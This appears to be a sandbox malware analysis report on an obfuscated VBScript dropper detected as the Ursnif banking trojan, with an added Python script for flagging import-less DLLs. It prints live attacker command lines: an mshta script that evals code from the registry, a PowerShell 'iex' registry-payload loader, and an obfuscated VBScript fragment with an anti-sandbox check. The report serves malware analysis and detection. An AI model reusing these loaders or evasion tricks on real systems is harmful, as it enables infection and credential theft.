Source: C:\Windows\System32\control.exe Code function: 30_2_0050D26C 30_2_0050D26C
Source: C:\Windows\System32\control.exe Code function: 30_2_004FCA04 30_2_004FCA04
Source: C:\Windows\System32\control.exe Code function: 30_2_004F021C 30_2_004F021C
Source: C:\Windows\System32\control.exe Code function: 30_2_004EA2EC 30_2_004EA2EC
Source: C:\Windows\System32\control.exe Code function: 30_2_005082E0 30_2_005082E0
Source: C:\Windows\System32\control.exe Code function: 30_2_00500354 30_2_00500354
Source: C:\Windows\System32\control.exe Code function: 30_2_004FE35C 30_2_004FE35C
Source: C:\Windows\System32\control.exe Code function: 30_2_00509344 30_2_00509344
Source: C:\Windows\System32\control.exe Code function: 30_2_004E7B14 30_2_004E7B14
Source: C:\Windows\System32\control.exe Code function: 30_2_004FC324 30_2_004FC324
Source: C:\Windows\System32\control.exe Code function: 30_2_004F0BB0 30_2_004F0BB0
Source: C:\Windows\System32\control.exe Code function: 30_2_004EBC1C 30_2_004EBC1C
Source: C:\Windows\System32\control.exe Code function: 30_2_004F7434 30_2_004F7434
Source: C:\Windows\System32\control.exe Code function: 30_2_004E7CCC 30_2_004E7CCC
Source: C:\Windows\System32\control.exe Code function: 30_2_004E34A0 30_2_004E34A0
Source: C:\Windows\System32\control.exe Code function: 30_2_004EB55C 30_2_004EB55C
Source: C:\Windows\System32\control.exe Code function: 30_2_0050FD7C 30_2_0050FD7C
Source: C:\Windows\System32\control.exe Code function: 30_2_004F7D60 30_2_004F7D60
Source: C:\Windows\System32\control.exe Code function: 30_2_004E4578 30_2_004E4578
Source: C:\Windows\System32\control.exe Code function: 30_2_0050AD28 30_2_0050AD28
Source: C:\Windows\System32\control.exe Code function: 30_2_004E3D81 30_2_004E3D81
Source: C:\Windows\System32\control.exe Code function: 30_2_004FEDA0 30_2_004FEDA0
Source: C:\Windows\System32\control.exe Code function: 30_2_00502E04 30_2_00502E04
Source: C:\Windows\System32\control.exe Code function: 30_2_004E5628 30_2_004E5628
Source: C:\Windows\System32\control.exe Code function: 30_2_004EAF44 30_2_004EAF44
Source: C:\Windows\System32\control.exe Code function: 30_2_00501F74 30_2_00501F74
Source: C:\Windows\System32\control.exe Code function: 30_2_004E9F7C 30_2_004E9F7C
Source: C:\Windows\System32\control.exe Code function: 30_2_004E4734 30_2_004E4734
Source: C:\Windows\System32\control.exe Code function: 30_2_0050D72C 30_2_0050D72C
Source: C:\Windows\System32\control.exe Code function: 30_2_004E8FC8 30_2_004E8FC8
Source: C:\Windows\System32\control.exe Code function: 30_2_004F9FD0 30_2_004F9FD0
Source: C:\Windows\System32\control.exe Code function: 30_2_0050DFF8 30_2_0050DFF8
Source: C:\Windows\System32\control.exe Code function: 30_2_004F07AC 30_2_004F07AC
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B2F90 32_2_000001B5767B2F90
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767BAE80 32_2_000001B5767BAE80
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767AC188 32_2_000001B5767AC188
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767BCA04 32_2_000001B5767BCA04
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C59F8 32_2_000001B5767C59F8
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B6A74 32_2_000001B5767B6A74
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CD26C 32_2_000001B5767CD26C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B021C 32_2_000001B5767B021C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A7B14 32_2_000001B5767A7B14
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767AA2EC 32_2_000001B5767AA2EC
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C82E0 32_2_000001B5767C82E0
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A9F7C 32_2_000001B5767A9F7C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C1F74 32_2_000001B5767C1F74
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767AAF44 32_2_000001B5767AAF44
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A4734 32_2_000001B5767A4734
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CD72C 32_2_000001B5767CD72C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CDFF8 32_2_000001B5767CDFF8
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B9FD0 32_2_000001B5767B9FD0
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A8FC8 32_2_000001B5767A8FC8
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B07AC 32_2_000001B5767B07AC
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A207C 32_2_000001B5767A207C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C8844 32_2_000001B5767C8844
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A8824 32_2_000001B5767A8824
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A3908 32_2_000001B5767A3908
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C610C 32_2_000001B5767C610C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CB0F8 32_2_000001B5767CB0F8
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CF8E8 32_2_000001B5767CF8E8
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A3D81 32_2_000001B5767A3D81
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A4578 32_2_000001B5767A4578
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CFD7C 32_2_000001B5767CFD7C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B7D60 32_2_000001B5767B7D60
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767AB55C 32_2_000001B5767AB55C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767CAD28 32_2_000001B5767CAD28
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C2E04 32_2_000001B5767C2E04
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767BEDA0 32_2_000001B5767BEDA0
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A5628 32_2_000001B5767A5628
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767BE35C 32_2_000001B5767BE35C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C0354 32_2_000001B5767C0354
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767C9344 32_2_000001B5767C9344
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767BC324 32_2_000001B5767BC324
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B0BB0 32_2_000001B5767B0BB0
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B7434 32_2_000001B5767B7434
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767ABC1C 32_2_000001B5767ABC1C
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A7CCC 32_2_000001B5767A7CCC
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767A34A0 32_2_000001B5767A34A0
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767E1570 32_2_000001B5767E1570
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\ogress.psd 034F2720D2408955AE412FD3657F6D1E50677CFCC8B5D030F3BC1F9D195AD21F
Java / VBScript file with very long strings (likely obfuscated code)
Source: PtgzM1Gd04Up.vbs Initial sample: Strings found which are bigger than 50
PE file does not import any functions
Source: cwptyz3z.dll.24.dr Static PE information: No import functions for PE file found
Source: z00zcx10.dll.26.dr Static PE information: No import functions for PE file found
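The two dropped DLLs above are flagged because their PE import directory is empty. A DLL with no imports cannot have been produced by an ordinary build, since even a trivial module imports something from the CRT or kernel32; an empty import table usually means the code resolves the APIs it needs at runtime (PEB walk, export hashing) or the file is a carrier for shellcode. The check itself is a header read. The following is an added example, not the sandbox's own logic: a minimal parser that locates the optional header, handles both PE32 and PE32+ layouts, and reports whether the import and delay-import directories are both empty. The sample images it builds are constructed in-line (hypothetical, only headers, no sections) so the check runs offline; point `main` at a real file to check a dropped DLL.

```python
"""Detect PE images with no import directory (the report's 'PE file does not import any functions').
Added example; minimal header parser, not the sandbox's code."""
import struct
import sys

IMAGE_DIRECTORY_ENTRY_IMPORT = 1          # DataDirectory index of the import table
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT = 13   # DataDirectory index of the delay-load import table


def _data_directory(pe: bytes, index: int) -> tuple:
    """Return (VirtualAddress, Size) of DataDirectory[index]; (0, 0) when the entry is absent."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not a PE: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE: missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER, 20 bytes
    (size_of_optional,) = struct.unpack_from("<H", pe, coff + 16)
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    (magic,) = struct.unpack_from("<H", pe, opt)
    if magic == 0x10B:                                    # PE32: NumberOfRvaAndSizes @92, DataDirectory @96
        num_off, dir_off = 92, 96
    elif magic == 0x20B:                                  # PE32+: NumberOfRvaAndSizes @108, DataDirectory @112
        num_off, dir_off = 108, 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    (num_dirs,) = struct.unpack_from("<I", pe, opt + num_off)
    entry = opt + dir_off + 8 * index
    # A header that declares fewer directories than 'index' has no such table at all.
    if index >= num_dirs or entry + 8 > opt + size_of_optional:
        return (0, 0)
    return struct.unpack_from("<II", pe, entry)


def has_no_imports(pe: bytes) -> bool:
    """True when neither the import nor the delay-import directory is present."""
    return all(_data_directory(pe, i) == (0, 0)
               for i in (IMAGE_DIRECTORY_ENTRY_IMPORT, IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT))


def build_minimal_pe(pe32plus: bool, import_rva: int = 0, import_size: int = 0) -> bytes:
    """Constructed test image: DOS stub, PE signature, COFF header and an optional header with
    16 data directories. Only the import entry is populated; there are no sections."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                  # e_lfanew -> right after the DOS header
    opt_size = 240 if pe32plus else 224
    machine = 0x8664 if pe32plus else 0x14C
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics (EXECUTABLE_IMAGE | DLL | LARGE_ADDRESS_AWARE)
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, 0x2022)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    num_off, dir_off = (108, 112) if pe32plus else (92, 96)
    struct.pack_into("<I", opt, num_off, 16)
    struct.pack_into("<II", opt, dir_off + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT, import_rva, import_size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, "no imports" if has_no_imports(fh.read()) else "has imports")
```

A hit from this check is a strong triage signal on its own; pair it with the runtime evidence the report gives for the same files (loaded by rundll32.exe, Yara matches in its memory) before drawing conclusions, since packers and some legitimately hand-built stubs also ship without imports.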
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: cryptdlg.dll
Source: C:\Windows\explorer.exe Section loaded: msimg32.dll
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winVBS@33/54@13/2
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{8181790E-F663-11EA-90E2-ECF4BB862DED}.dat Jump to behavior
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{9EDCD723-651B-8095-DFB2-69B48306AD28}
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{92E87600-C9EE-9429-E3E6-0D08C77A91BC}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{DA5DC80A-7193-1C76-CBAE-35102FC23944}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_01
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PtgzM1Gd04Up.vbs'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: PtgzM1Gd04Up.vbs Virustotal: Detection: 19%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PtgzM1Gd04Up.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:9474 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:4068644 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:9484 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:75036 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCAFE.tmp' 'c:\Users\user\AppData\Local\Temp\CSCD3EB2606A30F49E59B9A84403A1A868D.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\z00zcx10.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD743.tmp' 'c:\Users\user\AppData\Local\Temp\CSC711CCB0208342BE82936D1DDCB3B6.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\90E6.bi1'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\90E6.bi1'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:4068644 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:9484 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:75036 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\z00zcx10.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCAFE.tmp' 'c:\Users\user\AppData\Local\Temp\CSCD3EB2606A30F49E59B9A84403A1A868D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD743.tmp' 'c:\Users\user\AppData\Local\Temp\CSC711CCB0208342BE82936D1DDCB3B6.TMP'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\90E6.bi1'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\90E6.bi1'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\Office\16.0\Lync
Source: PtgzM1Gd04Up.vbs Static file information: File size 1452344 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.555737591.0000000007640000.00000002.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 0000001E.00000002.580658833.000001C3E83CC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000001E.00000002.580658833.000001C3E83CC000.00000004.00000040.sdmp
Source: Binary string: c:\meet\well\Brought\story\During\2\claim\84\Could\6\Element\Motion\3\Shore\market.pdb source: wscript.exe, 00000000.00000003.377834688.0000020569C36000.00000004.00000001.sdmp, ogress.psd.0.dr
Source: Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.555737591.0000000007640000.00000002.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface:
WScript.ScriptName, cStr(555551152)) > 0 And astronomy146 = 0) Then
Exit Function
' gargle triphammer fusillade Emile goober height Colombia317 Cameroon infantile macaque Virgil15 larynx Blair Vassar citron Marjory319 ticket Horowitz doubt pounce genius prolate expurgate trichloroethane hap114 gurgle spear Tommie stereo contraption clank710 counterfeit boutique teenage attrition stratify stannic polysemous volcanism candle stenographer649 noontime metallography, 8485223 chrome night clapboard squalid wacky. 1611065 iambic Belgrade697 peaceful kickback formulaic versus tuff598 xerox899 gaur registrable quagmire. distort767 bodybuilding channel diagrammed parolee900 Balzac. acme. Kirkpatrick stardom virgin payroll688, 230300 Corbett646 Isaiah tectonic Sharon787 abolition planet nightshade Bini touchdown condescension effusion728 societal proverbial822 raven erosion twig gadgetry. cavalier townsmen Arlen solitary exclusive Togo side960 crore gardenia skyhook proctor
End If
Set waggle651 = GetObject("winmgmts:\\.\root\cimv2")
Set adjust193lItems = waggle651.ExecQuery("Select * from Win32_Processor", , ((46 + 34.0) + (-((88 + (-60.0)) + 4.0))))
For Each glycine543 In adjust193lItems
If glycine543.NumberOfCores < (((1786 - 1758.0) + (40 + (-30.0))) - 35.0) Then
ISsAHR = True
REM soup extent populism curvilinear Ethiopia290 adposition lineman glycerinate77 Hillcrest Vance scapula metazoa console48 athletic herringbone raillery jure adorn fiance Middlesex miniature58 spiritual McHugh813 Bengal repelling pyrotechnic bivalve215 Cottrell Sandburg seder swart murk comprehend serology Tunis souvenir362 hoodlum quartile pike switchboard clairvoyant arabesque580 continual bindle collard616 chassis rainy fifteenth shorthand
End If
REM prosody indices. 2301989 booky875 Swede hardcopy lessee devotion507, 9597409 Congo542 commandant493 Syria. bakery692. tori bushy560 highball nugget401 bedfast Copenhagen down commensurate dot paragon574 surname spree clairvoyant664 Oneida Bose636 CDC panicky. 851619 begetting. 5002303 bifocal945 Bushnell134 prick827 planeload113 equatorial187. keelson slapstick merchant511 nor contrabass leggy cluster Stewart rheostat Essen471 spheric re lobby henceforth merrymake spangle Leland contain Standish crutch607 blowup smuggle Wittgenstein650 fugal, 745304 Thessaly. 9793611 conqueror851 Casanova770 transferral spear282 indecomposable Macedonia ecosystem poison pathogenic, skipjack idyllic980 solitude moose Palomar Knapp un shrimp archetype yarn Multics radian Howe291 Cowan Caldwell, converge aching isocline Bavaria variable otiose977 voyage paper, autopilot332
Next
If ISsAHR Then
AYdtfwwD
End If
' minesweeper548 violin603, glove scowl mignon40 Markov lovebird, thirst godmother Mukden Cranford. gunmen Wilma genealogy ski tokamak947 abetting ecosystem715 apocalyptic, sora tyrannicide serf resist Eduardo Christensen Catherwood disrupt mercurial seaboard, 6929809 rein933 fin extent210 polytope. qua modern10 . indelicate lycopodium explicate hesi
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\z00zcx10.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\z00zcx10.cmdline'
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\explorer.exe Code function: 29_2_04CF5699 push 3B000001h; retf 29_2_04CF569E
Source: C:\Windows\System32\control.exe Code function: 30_2_004F5699 push 3B000001h; retf 30_2_004F569E
Source: C:\Windows\System32\rundll32.exe Code function: 32_2_000001B5767B5699 push 3B000001h; retf 32_2_000001B5767B569E

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\cwptyz3z.dll
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\ogress.psd
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\z00zcx10.dll
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\ogress.psd

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
